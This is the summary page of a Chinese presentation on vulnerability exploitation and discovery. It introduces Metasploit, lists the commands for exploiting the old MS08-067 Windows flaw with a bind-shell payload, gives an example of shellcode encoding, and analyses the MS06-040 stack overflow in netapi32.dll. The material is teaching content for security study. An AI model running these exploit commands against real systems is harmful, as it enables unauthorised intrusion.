基本信息

---

下载

文档摘要

---

漏洞的利用分析与挖掘汇报人：吴凯

漏洞的利用Metosploit相关介绍Metasploit是一个很强大的入侵工具集，包含了900多种流行的操作系统及应用软件的漏洞，以及224个shellcode从它出生开始就是最强的漏洞利用和编写工具。

具体使用情况以MS08-067漏洞为例，整个入侵过程由如下几个命令组成：useexploit/windows/ms08-067-netapisetpayloadwindows/shell/bind-tcpsetRhostip地址setport端口号exploit

shellcode的重编码编码命令举例：usewindows/execsetCMDnotepad.exegenerate-b\x00-eshikata_ga_nai-tc

漏洞分析此次分析以MS06-040这个典型的栈溢出为例ms06-040的主要问题在于netapi32.dll这个动态链接库中的导出函数存在缓冲溢出，即netpwpathcanonicalize〔〕函数中的栈溢出漏洞编译漏洞触发poc代码并运行后，就可以进行动态调试分析了

漏洞函数中存在着一次wcscat函数调用，它先将arg-4所指的字符串复制到栈中，再将arg-1的长字符串连接在末尾，导致栈溢出

漏洞触发过程

漏洞挖掘